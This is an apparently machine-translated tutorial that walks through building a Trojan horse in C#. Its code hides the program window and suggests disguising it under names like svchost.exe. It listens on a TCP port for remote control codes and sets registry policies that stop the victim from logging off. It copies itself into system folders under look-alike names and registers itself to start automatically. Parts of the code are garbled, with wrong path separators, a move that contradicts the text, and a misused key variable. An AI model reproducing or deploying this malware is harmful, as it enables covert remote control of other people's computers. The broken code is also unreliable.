A detailed explanation of Trojan horse program based on C

This article takes C# as an example to explain the implementation process of Trojan horse program. To achieve the Trojan service procedures, mainly to achieve the following functions: the background of the operation (hidden technology), control code received and registry modification, the following three aspects for the introduction:

In C # 1, and set up a background service program is easy, to establish a new C # Windows application, project name set (but can be used to conceal and system of similar names, such as svchost. exe, etc.), will form attribute "ShowInTaskbar" attribute set to false, let it run time will not be shown in the task bar, and the attribute "Windowstate attribute set to" Mininized can, so that the form can hide run. Of course, you can also set it in InitializeComponent(). This function initializes and runs before the form is displayed, as follows:

private void InitializeComponent()
{
//
// Form1
//
// The starting point and size of the form display 
this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
this.ClientSize = new System.Drawing.Size(368, 357);
// Name of the form 
this.Name = "Form1";
// Set the properties to run in the background 
this.ShowInTaskbar = false;
this.Text = "Form1";
this.WindowState = System.Windows.Forms.FormWindowState.Minimized;
}

2, control the code reception, must be started at the beginning of the service program run, so the listening thread must be started in the program initialization, so put in the form's constructor, code annotations are as follows:

public Form1() // The constructor for the form 
{
//
// Windows  Forms designer support required 
//
InitializeComponent();
//
// TODO:  in  InitializeComponent  Add any constructor code after the call 
// Add your listening code 
// You can set the port yourself. I used a fixed port 
int port =6678;
//System.Net.Sockets.TcpListener Is used in Tcp Listens for clients in the network 
listener = new TcpListener(port);
// Start the listener 
listener.Start();
// Increase the thread receiving the control code, if you want to stop the thread can be used  Thread.abort()
//reControlCode  Is a function that the thread starts to execute, based on the received control 
// The control code selects the appropriate registry modification function 
Thread thread = new Thread(new ThreadStart(reControlCode));
thread.Start();
}

reControlCode function is as follows. See the program for the complete code:

private void reControlCode()
{
// Set the receive socket, receive listener.AcceptSocket Is to return a request from a customer that has been received 
socket = listener.AcceptSocket();
// If the connection executes successfully 
while (socket.Connected)
{
// Receiving control code 
byte [] by =new byte[6];
int i = socket.Receive(by,by.Length ,0);
string ss = System.Text.Encoding.ASCII.GetString(by);
// Perform different functions according to the control code 
// Modify the registry to add encodings 
switch (ss)
{
case "jiance":// Test connection, return test information 
string str ="hjc";
byte [] bytee = System.Text.Encoding.ASCII.GetBytes(str);
socket.Send(bytee,0,bytee.Length,0);
break;
case "zx1000":
// Modify the registry function to define its own, see the analysis below 
UnLogOff();
// Return control message 
retMessage();
break;
case "zx0100":
// Modify the registry function 
UnClose();
// Return control message 
retMessage();
break;
// repeated case Functions and the previous 1 Sample, slightly off 
default:
break;
}//case
}//while
} //private void reControlCode

3, C# to achieve the registry modification, using the The System.Microsoft.Win32 command space in the NET class library provides two types of classes: those that handle events raised by the operating system and those that operate on the system registry. You can see how it is used below. Here I made a subroutine to modify the registry: make the computer unable to log out. Before the understanding of the registry, in the key SOFTWARE / / Microsoft / / Windows / / CurrentVersion / / / / Explorer Policies
Set the key NoLogOff to 1 to make the computer unlogout. Changes to the registry are implemented using C# in the following functions:

private void UnLogOff()
{
// Gets the top-level node of the host's registry 
Microsoft.Win32.RegistryKey rLocal = Registry.LocalMachine;
// Set up the 1 Variables for each of the registry's child keys 
RegistryKey key1;
try
{
// function RegistryKey.OpenSubkey(string registrykey,bool canwrite) Retrieves the specified child key 
//registrykey Is the user specified key value, canwrite  for true Can be modified, default is fasle Do not change 
key1 =
rLocal.OpenSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Policies//Explorer",true);
// Sets the key name and value of the child key 
key1.SetValue ("NoLogOff",1);
// Close the open child key 
key1.Close();
// Warning string setting 
mystr = mystr +"HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Policies//Explorer The key value Nologoff Be modified! Please put it as 0!";
}
catch{}
// If there is no self built 
if(key1 ==null)
{
try
{
// use RegistryKey.CreateSubKey(string mystring) Function to create the child keys you need 
RegistryKey key2 = rLocal.CreateSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Policies//Explorer");
key2.SetValue("NoLogOff",1);
key2.Close();
mystr = mystr +"HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Policies//Explorer The key value Nologoff Be modified! Please put it as 0!";
}
catch{}
}
}

4, in the Trojan program there is an important function is the replication and transfer of self. When the Trojan horse is introduced to the controlled host, it is necessary to automatically hide the Trojan horse in the directory of System,System32 to avoid detection. Transfer code analysis is as follows, the main implementation is the function of moving D plate under the trojans to C: / / winnnt / / system / / msdoss exe, change the name at the same time. The use of. The NET namespace System.IO is used to allow both synchronous and asynchronous reads and writes to data streams and files. Here we use the System.IO.File class.

private void moveCC1()
{
try
{
// function File.Move(string sourceFileName,string destFileName) Moves files 
//sourceFileName Is the file name to move, destFileName The new path for the file 
File.Move("C://winnnt//system//msdoss.exe","d://winnt//system32//expleror.exe");
}
catch {}
// Set the new Trojan horse to start itself. Analysis and preceding 1 sample 
try
{
key1 = rLocal.OpenSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Run",true);
key1.SetValue ("microsoftt","d://winnt//system32//expleror.exe");
key1.Close();
}
catch{}
if(key1 ==null)
{
try
{
RegistryKey key2=rLocal.CreateSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Run");
key1.SetValue ("microsoftt","d://winnt//system32//expleror.exe");
key1.Close();
}
catch{}
}
} //moveCC1()